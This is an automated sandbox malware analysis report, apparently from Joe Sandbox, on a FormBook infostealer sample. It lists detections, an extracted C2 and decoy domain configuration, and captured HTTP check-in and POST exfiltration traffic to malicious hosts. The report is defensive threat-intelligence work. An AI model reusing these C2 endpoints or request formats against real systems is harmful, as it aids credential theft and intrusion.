Windows Analysis Report
e6o7hKFmfC

Antivirus detection for URL or domain

Source: Yara match	File source: 3.0.e6o7hKFmfC.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.e6o7hKFmfC.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.e6o7hKFmfC.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.e6o7hKFmfC.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.e6o7hKFmfC.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.e6o7hKFmfC.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.e6o7hKFmfC.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.e6o7hKFmfC.exe.3fc6e58.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.703057541.00000000023D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.455184548.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.703514050.00000000026D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.527437534.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.527732322.0000000000BC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.527662253.0000000000A70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.454684714.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.495550893.000000000E9FF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.513448398.000000000E9FF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.465620003.0000000003F69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.702688779.0000000000390000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Source: http://www.xjyjjy.com/uem3/	Avira URL Cloud: Label: malware
Source: http://www.astrofrance.online/uem3/?BpE=hw9wdlgRPJgu6mhEw3v3abu2JdZhLnzfTKsoEzFZGCpKAu6wx+OREaAyoHMqAY/6AEPW&SH=IDKTKDM	Avira URL Cloud: Label: phishing
Source: http://www.homesteaddesignstudio.net/uem3/	Avira URL Cloud: Label: malware
Source: http://www.xjyjjy.com/uem3/?BpE=Kc68PjQ5YLKhI5YJGbmTtSVcH4y3rSoSs1SAKTtyyAoVNP+YqbFEGdxEoFZf0m2HIavw&SH=IDKTKDM	Avira URL Cloud: Label: malware
Source: http://www.astrofrance.online/uem3/	Avira URL Cloud: Label: phishing
Source: www.boxingfishstudios.com/uem3/	Avira URL Cloud: Label: malware

Machine Learning detection for sample

Source: e6o7hKFmfC.exe

Joe Sandbox ML: detected

Source: 3.2.e6o7hKFmfC.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.0.e6o7hKFmfC.exe.400000.4.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.0.e6o7hKFmfC.exe.400000.8.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.0.e6o7hKFmfC.exe.400000.6.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Source: 0000000B.00000002.703057541.00000000023D0000.00000040.10000000.00040000.00000000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.boxingfishstudios.com/uem3/"], "decoy": ["darwinschools.com", "polytherm-vloerverwarming.com", "sinibelanja.website", "erasemy.info", "domainedelapoujade.info", "freidaperry.com", "ensoustudio.com", "xjyjjy.com", "ezhuilike.com", "equipoheza.com", "vtsr-health.com", "elanagro.online", "savas-jewelry.com", "hispahoo.com", "nlsc.chat", "wharxl.icu", "funandfoodboat.com", "usdtsearch.com", "experimentguardian.xyz", "bikeell.com", "betterviewconstructionlbk.com", "ghettogunclub.com", "turspot.com", "xin175.com", "hayatcevredanismanlik.com", "vd0z5br8fd1yw.xyz", "appindustry.online", "timinis23.com", "ramaniclothing.com", "wisdomedu.info", "duckholland.com", "disintar.xyz", "paragondronesolutions.com", "cronos-dapp.com", "hnfstricareeast.com", "tatyejoao.com", "xcashe.com", "holythricehq.com", "roslandcapittal.com", "icarus-soft.com", "kamerad.xyz", "vineabank.com", "chahuajie.com", "mezilus.com", "think-and-create.com", "arslanrecep.com", "themgboutique.com", "onlinemarketingdegreesar.com", "greattaxhelper.com", "zackbphoto.com", "kimisugar.com", "fa1063.xyz", "astrofrance.online", "homesteaddesignstudio.net", "norskeplanteskoler.online", "pastafrescabg.com", "rentrentrent.online", "wolfgestione.com", "hubinvoice.com", "penelopegracemusic.com", "tsrhlive.com", "midbots.com", "antipeek.net", "veekvefs.com"]}

Source: e6o7hKFmfC.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: e6o7hKFmfC.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: cmmon32.pdb source: e6o7hKFmfC.exe, 00000003.00000002.527834335.0000000000C30000.00000040.10000000.00040000.00000000.sdmp, e6o7hKFmfC.exe, 00000003.00000002.527881557.0000000000C8A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: cmmon32.pdbGCTL source: e6o7hKFmfC.exe, 00000003.00000002.527834335.0000000000C30000.00000040.10000000.00040000.00000000.sdmp, e6o7hKFmfC.exe, 00000003.00000002.527881557.0000000000C8A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: e6o7hKFmfC.exe, 00000003.00000002.528089718.000000000104F000.00000040.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000003.00000002.527924593.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000003.00000003.455627163.0000000000AC0000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000003.00000003.458113426.0000000000D8F000.00000004.00000800.00020000.00000000.sdmp, cmmon32.exe, 0000000B.00000002.705432142.000000000453F000.00000040.00000800.00020000.00000000.sdmp, cmmon32.exe, 0000000B.00000003.529190263.0000000004286000.00000004.00000800.00020000.00000000.sdmp, cmmon32.exe, 0000000B.00000002.704982453.0000000004420000.00000040.00000800.00020000.00000000.sdmp, cmmon32.exe, 0000000B.00000003.527621259.00000000040C3000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: e6o7hKFmfC.exe, 00000003.00000002.528089718.000000000104F000.00000040.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000003.00000002.527924593.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000003.00000003.455627163.0000000000AC0000.00000004.00000800.00020000.00000000.sdmp, e6o7hKFmfC.exe, 00000003.00000003.458113426.0000000000D8F000.00000004.00000800.00020000.00000000.sdmp, cmmon32.exe, 0000000B.00000002.705432142.000000000453F000.00000040.00000800.00020000.00000000.sdmp, cmmon32.exe, 0000000B.00000003.529190263.0000000004286000.00000004.00000800.00020000.00000000.sdmp, cmmon32.exe, 0000000B.00000002.704982453.0000000004420000.00000040.00000800.00020000.00000000.sdmp, cmmon32.exe, 0000000B.00000003.527621259.00000000040C3000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Code function: 4x nop then pop edi	3_2_004180D3
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Code function: 4x nop then pop esi	3_2_004174B0
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Code function: 4x nop then pop esi	3_2_00417591

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 213.186.33.5 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 199.192.23.166 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.duckholland.com
Source: C:\Windows\explorer.exe	Network Connect: 101.36.112.119 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.homesteaddesignstudio.net
Source: C:\Windows\explorer.exe	Domain query: www.xjyjjy.com
Source: C:\Windows\explorer.exe	Network Connect: 188.114.96.6 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.astrofrance.online
Source: C:\Windows\explorer.exe	Domain query: www.timinis23.com
Source: C:\Windows\explorer.exe	Network Connect: 154.94.246.226 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.domainedelapoujade.info

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49872 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49872 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49872 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49922 -> 154.94.246.226:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49922 -> 154.94.246.226:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49922 -> 154.94.246.226:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.boxingfishstudios.com/uem3/

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: OVHFR OVHFR

Source: global traffic	HTTP traffic detected: GET /uem3/?SH=IDKTKDM&BpE=0e5ylS0mR5Iv24OzcR2s4uNeaAp+yJmWD1izpzSJBOsV3UDfR6yWX1PKUNeuwqbGEXMx HTTP/1.1Host: www.timinis23.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /uem3/?BpE=hw9wdlgRPJgu6mhEw3v3abu2JdZhLnzfTKsoEzFZGCpKAu6wx+OREaAyoHMqAY/6AEPW&SH=IDKTKDM HTTP/1.1Host: www.astrofrance.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /uem3/?SH=IDKTKDM&BpE=V2TDWYSqi/8fdllEzj4AbTg97NFaRkku6BamUZomS0y+YREnVG6xukPcgSdf2jxlzQp6 HTTP/1.1Host: www.domainedelapoujade.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /uem3/?SH=IDKTKDM&BpE=e7lgbbJx7/LPlk8h2XTeLpVDgGYjKiXPdD9XuQrM1srGI3PqQ6DhnuaFHJpKRw83QeNd HTTP/1.1Host: www.homesteaddesignstudio.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /uem3/?BpE=Kc68PjQ5YLKhI5YJGbmTtSVcH4y3rSoSs1SAKTtyyAoVNP+YqbFEGdxEoFZf0m2HIavw&SH=IDKTKDM HTTP/1.1Host: www.xjyjjy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /uem3/?SH=IDKTKDM&BpE=4t2Z3lNwjnLZlDwEEC0m8LkRlQI0Pl9ucZSXJIF5IRDrQEKlG6sw6AjHC30zWhIZsVHq HTTP/1.1Host: www.duckholland.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

IP Address: 213.186.33.5 213.186.33.5

Source: global traffic	HTTP traffic detected: POST /uem3/ HTTP/1.1Host: www.astrofrance.onlineConnection: closeContent-Length: 713Cache-Control: no-cacheOrigin: http://www.astrofrance.onlineUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.astrofrance.online/uem3/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 42 70 45 3d 75 79 4a 4b 44 46 49 35 4d 75 6f 6c 6a 78 77 75 75 67 65 32 63 37 50 52 4e 49 46 74 4b 6d 61 64 4e 4f 78 41 57 78 5a 37 42 42 64 70 4a 61 71 71 38 4c 50 42 57 74 74 78 30 78 6b 2d 4c 4e 76 54 55 51 50 30 44 49 72 31 59 54 52 67 31 38 6d 41 37 55 57 43 6f 36 48 64 67 68 6e 73 31 79 32 57 55 4e 28 66 43 51 75 56 31 4f 46 51 34 35 6f 32 7e 4a 46 77 38 74 31 66 5a 61 67 4b 61 49 5a 57 71 64 32 64 35 4e 52 30 56 37 57 7a 6b 44 73 65 58 68 4b 63 48 72 61 4f 70 71 38 35 58 6f 75 57 4d 33 78 5a 49 6e 56 39 44 45 6a 68 43 5a 4a 72 4a 6c 46 42 6c 6e 45 4b 6c 59 4f 38 77 41 72 4a 79 75 52 78 47 6b 31 71 4c 75 6e 50 39 33 39 47 64 55 4a 32 59 6a 33 46 4e 74 54 50 4b 6f 48 6f 61 4c 70 52 31 6d 74 46 4b 75 44 70 67 4b 4a 47 59 44 42 61 51 47 39 37 7e 65 7a 30 65 55 34 72 78 72 7a 4d 6d 6e 59 68 52 30 46 50 6b 6e 74 67 75 57 36 31 39 63 54 7a 71 34 67 6f 32 57 39 4b 6b 74 59 4f 4a 47 6d 6b 36 6b 35 79 4e 4c 4c 4e 6a 64 51 44 44 66 72 6d 6a 54 71 47 43 62 31 46 6f 47 55 68 49 4b 7e 67 50 76 32 78 57 5a 61 63 31 49 52 56 34 63 62 70 4a 33 70 4b 4c 61 6d 4b 34 75 6e 34 37 75 6d 71 39 75 50 58 6b 51 4c 67 65 35 30 72 61 71 76 71 42 5f 45 75 44 43 54 62 43 7a 5a 46 4e 63 7a 58 31 67 74 77 31 56 47 68 7e 74 34 77 62 6a 74 2d 64 69 7a 42 72 77 62 56 6f 64 45 68 79 6a 6b 78 7a 43 6c 75 28 54 6e 76 6d 4c 35 69 4d 73 41 53 50 68 48 45 43 53 67 69 66 69 66 55 5a 4c 4b 33 66 6e 39 58 48 6d 30 45 5a 4c 49 67 68 5a 64 6d 5a 5a 6b 36 32 2d 68 6d 65 44 33 6a 37 51 6e 63 49 76 6d 62 6a 2d 73 5a 41 48 74 32 6e 6f 4c 32 7e 47 51 2d 35 65 77 7a 38 6a 4f 41 44 63 53 41 49 43 4e 44 36 55 64 71 6e 62 56 71 4e 47 7a 35 7a 43 79 5f 47 4f 4c 78 79 6f 4f 6b 68 4c 58 45 4d 51 28 56 71 30 71 63 47 5f 71 39 32 74 78 71 48 49 74 6b 50 56 73 33 72 39 44 4d 42 4c 68 68 6c 61 76 30 67 59 6b 45 34 6c 33 68 38 72 6f 5f 59 63 63 38 4d 37 43 57 7e 5f 46 78 76 51 55 53 4a 79 63 5f 44 66 65 4e 68 69 45 47 68 78 6a 66 67 79 41 43 74 54 42 4e 4b 6c 42 45 56 63 54 75 32 4b 30 37 53 63 79 48 67 75 79 33 6f 58 56 52 36 75 6b 74 47 37 39 69 52 5a 32 48 41 53 50 56 34 55 73 43 28 31 52 4d 59 2d 4b 71 53 57 4a 32 34 52 51 30 73 6e 62 77 43 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: BpE=uyJKDFI5Muoljxwuuge2c7PRNIFtKmadNOxAWxZ7BBdpJaqq8LPBWttx0xk-LNvTUQP0DIr1YTRg18mA7UWCo6Hdghns1y2WUN(fCQuV1OFQ45o2~JFw8t1fZagKaIZWqd2d5NR0V7WzkDseXhKcHraOpq85XouWM3xZInV9DEjhCZJrJlFBlnEKlYO8wArJyuRxGk1qLunP939GdUJ2Yj3FNtTPKoHoaLpR1mtFKuDpgKJGYDBaQG97~ez0eU4rxrzMmnYhR0FPkntguW619cTzq4go2W9KktYOJGmk6k5yNLLNjdQDDfrmjTqGCb1FoGUhIK~gPv2xWZac1IRV4cbpJ3pKLamK4un47umq9uPXkQLge50raqvqB_EuDCTbCzZFNczX1gtw1VGh~t4w
Source: global traffic	HTTP traffic detected: POST /uem3/ HTTP/1.1Host: www.astrofrance.onlineConnection: closeContent-Length: 36477Cache-Control: no-cacheOrigin: http://www.astrofrance.onlineUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.astrofrance.online/uem3/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 42 70 45 3d 75 79 4a 4b 44 42 49 72 52 75 4d 77 76 42 31 49 74 54 76 68 50 4c 66 54 65 4a 56 32 45 43 50 44 4b 36 31 79 59 54 77 61 41 41 56 7a 4f 72 53 54 34 4e 62 4a 57 73 64 55 39 6e 30 36 50 74 72 55 55 52 6e 57 44 49 76 31 5a 58 74 4b 37 2d 4f 71 36 32 7e 64 34 4b 48 78 68 68 6e 35 69 67 43 76 55 4e 72 32 43 51 6d 46 31 2d 35 51 35 62 67 32 70 61 64 46 34 4e 31 64 51 36 77 47 56 6f 45 45 71 64 76 62 35 50 56 30 56 4c 61 7a 6b 69 63 64 54 51 4b 54 66 72 61 42 37 36 38 73 42 59 69 6f 4d 33 30 30 49 6d 70 39 44 52 54 68 42 70 70 72 4e 69 35 41 75 33 45 46 75 34 4f 31 39 6c 7a 59 79 75 4e 31 47 6d 59 52 4d 62 58 50 38 48 39 46 4b 7a 31 49 63 78 65 4e 41 4e 50 34 4b 6f 4c 52 62 65 77 43 31 6e 41 6d 4a 64 4b 42 6c 73 30 54 59 46 5a 77 53 6d 39 5f 30 2d 79 77 65 55 35 61 78 72 79 74 6d 6d 6f 68 52 7a 5a 50 6c 44 5a 67 70 47 36 30 70 63 54 79 74 34 67 33 79 57 68 48 6b 74 41 34 4a 48 4f 6b 37 58 46 79 4e 61 72 4e 6b 5f 49 45 65 76 71 74 7a 6a 71 63 64 4c 31 41 6f 47 55 50 49 49 58 5f 4f 59 32 78 58 49 61 63 78 72 35 56 37 73 62 70 43 58 70 49 46 4b 37 53 34 75 28 30 37 73 4f 63 39 63 6a 58 6e 47 28 67 61 6f 30 72 65 61 76 71 4a 66 45 74 4a 53 54 42 43 7a 4a 6a 4e 59 76 48 30 52 68 77 30 30 32 68 35 50 41 77 64 54 74 36 51 79 79 47 36 67 47 7a 6f 63 67 35 79 6e 6f 4c 7a 56 56 75 35 45 72 76 33 5a 52 68 50 73 41 65 4f 68 48 63 47 53 39 45 66 6a 32 72 5a 4c 6d 65 66 55 39 58 49 58 30 45 55 4a 51 76 28 4a 64 67 59 5a 6c 68 74 75 74 4a 65 43 65 69 37 51 62 63 49 76 61 62 79 64 6b 5a 46 47 74 35 71 59 4c 74 7a 6d 51 4d 35 65 73 45 38 6a 53 41 44 64 47 32 49 79 64 44 36 31 4e 71 6e 74 35 6c 59 47 7a 7a 39 69 7a 72 43 4f 4c 49 79 6f 50 42 68 49 48 55 4d 6d 7a 56 70 6d 4f 63 43 75 71 39 35 4e 78 72 46 49 73 6d 4c 56 70 35 72 39 6d 47 42 4c 4e 68 6c 6f 72 30 76 5a 45 45 28 46 33 6d 79 37 6f 32 57 38 63 6e 61 4c 4f 32 7e 5f 39 54 76 52 30 6b 4b 41 77 5f 44 63 6d 4e 67 47 6b 46 68 42 6a 47 6c 79 41 64 74 54 41 79 4b 6c 41 6c 56 63 58 2d 32 4a 30 37 51 73 79 48 6d 76 79 30 73 48 56 51 71 2d 6b 5a 4d 62 39 70 52 5a 33 32 41 53 33 37 34 42 42 49 77 46 49 59 56 6f 53 5f 46 6d 55 64 6f 6a 64 4c 76 6c 32 6c 51 58 54 71 70 78 50 78 72 63 4b 62 58 59 5a 79 56 46 47 36 53 46 67 57 75 4a 66 35 56 54 77 50 6f 45 78 2d 43 43 5a 45 6d 74 45 73 61 45 77 57 41 54 36 78 6d 38 38 6b 31 4a 54 52 31 39 5a 36 42 71 33 4f 6f 4d 38 61 45 35 5a 35 28 45 7e 47 47 53 33 58 71 6c 33 6d 52 63 5a 53 32 6f 28 5f 37 45 39 4d 34 4b 77 47 52 47 57 41 74 73 35 4b 39 6f 45 4d 31 5a 71 2d 61 73 53 73 62 38 4d 44 66 6a 6e 54 70 77 78 6d 66 35 41 73 37 51 55 75 76 49 69 2d 4b 72 58 36
Source: global traffic	HTTP traffic detected: POST /uem3/ HTTP/1.1Host: www.domainedelapoujade.infoConnection: closeContent-Length: 713Cache-Control: no-cacheOrigin: http://www.domainedelapoujade.infoUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.domainedelapoujade.info/uem3/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 42 70 45 3d 61 30 6e 35 49 5f 7e 41 6f 66 55 52 4d 6c 51 4e 6b 6a 73 65 43 6c 42 5a 74 49 5a 58 58 6b 59 65 6e 30 6e 4d 41 4b 38 71 42 6c 71 48 52 78 63 71 56 6e 4c 33 39 78 61 4a 31 7a 64 66 79 7a 77 71 75 6d 31 77 59 37 30 52 53 64 44 38 72 64 75 44 76 53 32 6b 45 30 7e 73 66 78 46 63 32 42 38 70 44 66 6e 6f 59 37 4b 68 44 41 59 66 44 31 5a 48 4a 68 47 54 6b 73 35 74 6d 32 48 5f 71 7a 71 72 6c 55 47 58 68 7a 57 43 42 62 79 58 75 54 52 58 57 64 4a 53 4d 6c 44 4a 75 71 49 30 39 70 7e 6e 52 39 43 33 74 5f 38 4f 41 44 6f 4f 4e 63 4f 2d 61 5f 30 41 77 46 78 35 63 50 4b 57 4b 38 76 48 68 68 65 58 62 76 61 78 56 58 63 6e 70 55 28 55 4a 44 78 33 6b 30 67 75 7a 61 34 74 59 63 63 77 74 46 46 44 59 47 6a 58 58 72 5a 66 79 57 73 45 49 51 7a 6e 68 36 73 6c 5a 69 65 42 54 6c 6a 78 66 4e 56 41 53 31 37 75 35 46 79 41 39 73 4c 64 71 73 4d 36 76 6a 56 59 4c 6b 6c 48 70 72 48 50 50 56 63 35 53 4d 39 78 42 6f 32 68 46 4e 47 58 73 55 62 71 5a 76 6f 52 68 69 7a 6d 4c 6a 64 39 48 43 33 4f 42 37 74 36 50 61 38 35 6e 52 4a 2d 35 76 47 42 77 4c 7a 70 74 64 7a 6e 4d 31 28 64 4e 76 33 57 77 54 69 2d 57 57 76 41 34 54 6c 43 4f 6d 61 75 6f 4b 62 30 62 47 31 44 54 41 47 64 7e 56 32 39 35 6d 78 4e 54 75 49 36 51 31 6d 36 54 70 66 2d 38 61 50 63 39 61 52 66 6e 35 4c 38 79 76 78 6b 32 55 33 50 6c 6f 37 4b 56 30 43 72 32 2d 7e 66 6e 42 42 72 35 4e 6b 66 37 52 76 50 6b 5f 48 30 34 74 72 59 42 31 7a 6f 50 61 63 35 52 63 77 5a 7e 44 36 64 4d 42 32 79 57 50 62 57 53 32 44 76 78 51 63 68 74 37 57 74 78 36 32 56 66 6e 6e 64 6d 32 41 47 62 49 4f 4e 57 5f 59 57 39 43 62 4f 51 71 4c 36 56 73 6b 74 45 2d 6a 53 56 72 41 77 73 61 30 39 6e 4f 75 75 5a 68 43 6d 46 6d 6c 77 61 53 61 31 54 45 68 68 67 53 72 76 76 78 5a 7a 75 5f 7e 46 76 35 54 4e 33 49 79 6e 64 72 54 35 68 63 39 67 69 64 30 79 75 4c 36 4d 39 73 71 4d 59 70 61 77 62 56 4a 78 67 50 49 37 59 75 64 76 36 43 54 34 51 6a 48 39 39 50 63 55 6c 6f 7e 70 58 66 33 4f 30 6c 67 64 45 36 42 61 76 61 36 34 32 4d 54 70 48 78 58 62 4d 7a 38 78 53 59 66 65 42 54 37 36 7a 6b 39 34 79 6c 38 39 49 45 68 63 68 4e 51 6b 72 39 4e 33 63 68 35 43 59 54 4b 35 6a 44 49 2d 69 2d 66 5f 30 55 41 4e 61 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: BpE=a0n5I_~AofURMlQNkjseClBZtIZXXkYen0nMAK8qBlqHRxcqVnL39xaJ1zdfyzwqum1wY70RSdD8rduDvS2kE0~sfxFc2B8pDfnoY7KhDAYfD1ZHJhGTks5tm2H_qzqrlUGXhzWCBbyXuTRXWdJSMlDJuqI09p~nR9C3t_8OADoONcO-a_0AwFx5cPKWK8vHhheXbvaxVXcnpU(UJDx3k0guza4tYccwtFFDYGjXXrZfyWsEIQznh6slZieBTljxfNVAS17u5FyA9sLdqsM6vjVYLklHprHPPVc5SM9xBo2hFNGXsUbqZvoRhizmLjd9HC3OB7t6Pa85nRJ-5vGBwLzptdznM1(dNv3WwTi-WWvA4TlCOmauoKb0bG1DTAGd~V295
Source: global traffic	HTTP traffic detected: POST /uem3/ HTTP/1.1Host: www.domainedelapoujade.infoConnection: closeContent-Length: 36477Cache-Control: no-cacheOrigin: http://www.domainedelapoujade.infoUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.domainedelapoujade.info/uem3/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 42 70 45 3d 61 30 6e 35 49 39 72 5a 6e 50 49 36 49 31 73 2d 6b 57 68 4a 4b 32 5a 62 76 5a 4a 49 62 46 45 37 67 46 33 69 45 4f 34 39 43 6c 43 64 56 41 78 36 45 55 37 5a 39 7a 54 66 38 67 35 62 31 54 39 59 75 6d 64 4f 59 37 77 52 54 65 44 73 72 2d 6d 6c 75 30 61 6c 48 55 7e 51 65 78 45 66 79 45 6b 45 44 65 54 4b 59 36 79 50 43 77 30 66 41 58 52 48 4c 69 65 75 71 73 35 72 39 32 58 37 6b 54 33 42 6c 55 4f 50 68 79 71 43 41 72 7e 58 68 57 5a 51 51 61 64 52 46 56 44 49 70 71 49 74 32 4a 79 30 52 39 47 5a 74 5f 51 4f 41 77 4d 4f 4d 50 57 2d 4f 63 63 44 34 56 78 77 4c 76 4b 68 41 63 72 57 68 6c 28 59 62 75 76 54 56 6d 59 6e 70 6b 28 56 65 69 35 4a 31 58 34 66 31 71 6b 38 59 63 52 6b 74 32 42 68 59 45 6d 32 51 59 42 30 35 56 55 69 49 56 69 49 79 4b 74 75 58 43 65 47 54 6c 69 4f 66 4e 55 68 53 30 72 75 35 45 36 41 39 49 58 64 67 63 4d 37 6a 54 56 52 4d 6b 6c 45 28 62 36 7a 50 56 45 31 53 49 39 78 47 62 4b 68 47 39 6d 58 37 6d 44 70 66 5f 70 59 77 79 7a 43 49 54 64 79 48 43 32 62 42 36 74 71 50 4a 49 35 6d 46 6c 2d 37 4a 53 42 79 37 7a 70 78 4e 7a 68 46 56 7a 4e 4e 76 28 53 77 57 65 41 57 67 50 41 32 68 74 43 4e 45 69 75 71 36 62 30 41 57 31 4f 45 51 47 68 7e 55 47 31 35 6b 35 64 54 64 63 36 52 58 4f 36 65 71 37 2d 36 71 50 59 6b 71 51 41 6a 35 48 66 79 76 6c 73 32 51 76 78 6c 66 72 4b 58 58 4b 72 28 73 57 59 6a 78 42 76 34 4e 6b 35 6d 42 6a 30 6b 5f 75 46 34 6f 54 79 41 47 6a 6f 41 75 41 35 57 5f 55 57 37 44 36 58 4e 42 32 51 59 76 58 51 53 32 62 7a 78 52 67 68 74 34 79 74 77 4a 75 56 59 6b 50 65 6c 6d 41 42 57 6f 4f 6a 57 5f 55 62 39 43 58 4f 51 72 66 45 55 66 4d 74 56 72 28 53 64 2d 63 7a 33 61 30 37 69 4f 75 50 4c 52 43 70 46 6d 6c 5a 61 54 6a 74 54 32 70 68 6e 45 28 76 76 51 5a 7a 68 66 7e 49 38 35 53 53 38 6f 7e 62 64 72 48 48 68 5a 64 67 69 71 45 79 76 71 61 4d 38 4d 71 4e 41 70 61 31 50 6c 49 76 78 66 45 4c 59 76 35 52 36 44 7a 43 51 52 72 39 39 4e 6b 55 6c 4e 69 32 58 76 33 4c 6b 31 67 47 45 36 41 6c 76 61 36 57 32 4d 48 35 48 78 28 62 4e 44 38 78 57 71 33 42 4c 6a 37 37 30 6b 39 79 34 46 38 69 49 45 68 69 68 4e 5a 73 6f 6f 34 56 4d 41 67 79 54 6a 44 33 71 6a 51 31 79 38 79 52 30 6b 4a 37 47 37 41 67 67 4b 56 4b 36 72 70 72 38 32 5a 58 43 77 66 74 33 34 6e 78 37 4f 38 5f 43 2d 6b 51 68 66 55 63 4b 49 4d 62 64 4b 57 7a 6c 30 79 6d 79 69 4d 75 31 56 6e 59 39 5f 46 61 59 71 44 4e 44 64 47 79 32 34 4a 72 68 41 65 2d 79 72 76 4b 6d 59 45 72 7e 55 56 72 58 30 47 6b 5a 55 54 65 46 68 41 75 30 63 74 7a 45 6a 61 39 54 6c 52 6c 75 42 63 69 75 6a 44 49 41 76 54 58 68 5a 6a 51 35 34 4b 4f 53 7a 67 32 52 47 71 4c 61 35 76 30 59 6b 62
